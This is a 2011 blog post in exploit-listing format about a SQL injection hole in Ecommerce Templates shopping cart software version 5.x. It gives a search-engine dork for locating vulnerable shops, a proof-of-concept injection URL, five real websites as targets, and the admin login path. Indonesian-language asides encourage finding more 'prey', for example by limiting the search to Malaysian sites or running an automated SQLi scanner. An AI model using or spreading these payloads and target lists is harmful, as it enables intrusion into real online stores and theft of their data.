.: Dee Personal Blog :.

Subtitle

Blog

Shopping Cart Software by Ecommerce Templates SQLi Vulnerability By : X-Cisadane

Posted on September 10, 2011 at 1:45 PM

 

=========================================================================

Shopping Cart Software by Ecommerce Templates SQLInjection Vulnerability

=========================================================================

:-------------------------------------------------------------------------------------------------------------------------:

: # Exploit Title : Shopping Cart Software by Ecommerce Templates SQLInjection Vulnerability

: # Date : 11 September 2011

: # Author : X-Cisadane

: # Software Link : http://www.ecommercetemplates.com/

: # Version : 5.x

: # Category : Web Applications

: # Vulnerability : SQL Injetion Vulnerability

: # Tested On : Mozilla Firefox 5.x (Windows)

: # Dorks : inurl:/proddetail.php?prod= (Biar lebih banyak dapet mangsa pake Dork ini inurl:/proddetail.php?prod= site:my)

: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari

:-------------------------------------------------------------------------------------------------------------------------:

PoC : http://site/proddetail.php?prod='SQLi

 


Contoh :

http://www.nasamarine.com/proddetail.php?prod=ais_engine'

http://www.sizzlinwatches.com/proddetail.php?prod=sizz_auto_001'

http://essentialphotogear.com/proddetail.php?prod=MP'

http://www.spacetoys.com/proddetail.php?prod=CST11'

http://www.devmr.com/proddetail.php?prod=gingerettestin'


Admin Login :

http://site/vsadmin/login.php

 


P.S : Kalo mau gampang dapet mangsa, pake Scanner SQLi aza contohnya X-Code Exploit Scanner (buatan om Poni X-Code) : http://ferdianelli.wordpress.com/2011/01/08/update-08-jan-2011-xcode-sqlilfixss-vulnurable-webshell-scanner/

Categories: Exploit

Post a Comment

Oops!

Oops, you forgot something.

Oops!

The words you entered did not match the given text. Please try again.

You must be a member to comment on this page. Sign In or Register

0 Comments